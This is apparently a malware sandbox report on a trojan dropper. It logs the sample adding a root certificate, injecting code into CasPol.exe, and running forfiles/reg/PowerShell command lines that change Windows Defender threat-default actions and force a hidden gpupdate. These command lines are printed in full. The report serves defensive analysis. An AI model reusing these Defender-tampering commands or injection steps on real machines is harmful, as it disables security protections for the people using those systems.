huorong	HEUR:Trojan/Injector.as
Fortinet	W64/GenKryptik.MAGC!tr

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Powershell script adds registry entries (1 event)

cmd

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" powershell start-process -windowstyle hidden gpupdate.exe /forceforfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\pictures\pvxq006p3vijx91yq0krztj8.execmd /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6.\install.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\windows\microsoft.net\framework\v4.0.30319\caspol.exe"c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\pictures\ogmrvno8mvswpsmem9yekgfm.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6"c:\users\test22\pictures\pvxq006p3vijx91yq0krztj8.exe" .\install.exe /uycajdidt "385104" /sc:\windows\system32\gpupdate.exe /force forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" /c powershell start-process -windowstyle hidden gpupdate.exe /forcereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6"c:\windows\system32\gpupdate.exe" /force /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6"c:\users\test22\pictures\ogmrvno8mvswpsmem9yekgfm.exe"

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Windows\System32\gpupdate.exe /force
parent_process	powershell.exe				martian_process	"C:\Windows\system32\gpupdate.exe" /force

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 872 resumed a thread in remote process 776
Process injection	Process 2340 resumed a thread in remote process 2404
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000000000000140 suspend_count: 1 process_identifier: 776	1	0	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 2404	1	0	0

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Aug. 18, 2024, 2:11 p.m.	net_type: 0x00250000		1222	0

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

91.121.59.207:80

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147735503
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147814524
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147812831
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147780199

Executed a process and injected code into it, probably while unpacking (44 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000000000000b0 suspend_count: 1 process_identifier: 872	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2052 thread_handle: 0x0000000000000140 process_identifier: 776 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000144	1	1
NtUnmapViewOfSection Aug. 18, 2024, 2:11 p.m.	base_address: 0x0000000000400000 region_size: 11337728 process_identifier: 776 process_handle: 0x0000000000000144		-1073741799
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000144	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000000000000140 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x000001d8 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000618 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000630 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000066c suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000690 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 776	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2244 thread_handle: 0x0000077c process_identifier: 2240 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe track: 1 command_line: "C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe" filepath_r: C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000780	1	1
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 776	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2300 thread_handle: 0x00000750 process_identifier: 2308 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe track: 1 command_line: "C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe" filepath_r: C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000790	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2288 thread_handle: 0x0000001c process_identifier: 2284 current_directory: filepath: track: 1 command_line: .\Install.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000010c	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2344 thread_handle: 0x0000001c process_identifier: 2340 current_directory: filepath: track: 1 command_line: .\Install.exe /UYcajdidt "385104" /S filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000010c	1	1
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000128 suspend_count: 1 process_identifier: 2340	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2408 thread_handle: 0x0000028c process_identifier: 2404 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000318	1	1
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 2404	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2492 thread_handle: 0x0000012c process_identifier: 2488 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2664 thread_handle: 0x00000130 process_identifier: 2660 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000012c	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2796 thread_handle: 0x0000012c process_identifier: 2792 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2928 thread_handle: 0x00000130 process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000012c	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 3060 thread_handle: 0x0000012c process_identifier: 3056 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2564 thread_handle: 0x0000011c process_identifier: 2560 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2620 thread_handle: 0x0000012c process_identifier: 2616 current_directory: c:\windows\system32 filepath: c:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 filepath_r: c:\windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2708 thread_handle: 0x0000011c process_identifier: 2704 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2752 thread_handle: 0x0000012c process_identifier: 2748 current_directory: c:\windows\system32 filepath: c:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 filepath_r: c:\windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2840 thread_handle: 0x0000011c process_identifier: 2836 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2884 thread_handle: 0x0000012c process_identifier: 2880 current_directory: c:\windows\system32 filepath: c:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 filepath_r: c:\windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2972 thread_handle: 0x0000011c process_identifier: 2968 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 3016 thread_handle: 0x0000012c process_identifier: 3012 current_directory: c:\windows\system32 filepath: c:\Windows\System32\reg.exe track: 1 command_line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 filepath_r: c:\windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2116 thread_handle: 0x0000011c process_identifier: 2108 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2136 thread_handle: 0x0000012c process_identifier: 2140 current_directory: c:\windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x0000047c suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2140	1	0
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2436 thread_handle: 0x000004fc process_identifier: 2432 current_directory: C:\windows\system32 filepath: C:\Windows\System32\gpupdate.exe track: 1 command_line: "C:\Windows\system32\gpupdate.exe" /force filepath_r: C:\Windows\system32\gpupdate.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000504	1	1
NtResumeThread Aug. 18, 2024, 2:11 p.m.	thread_handle: 0x00000528 suspend_count: 1 process_identifier: 2140	1	0

Channel1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All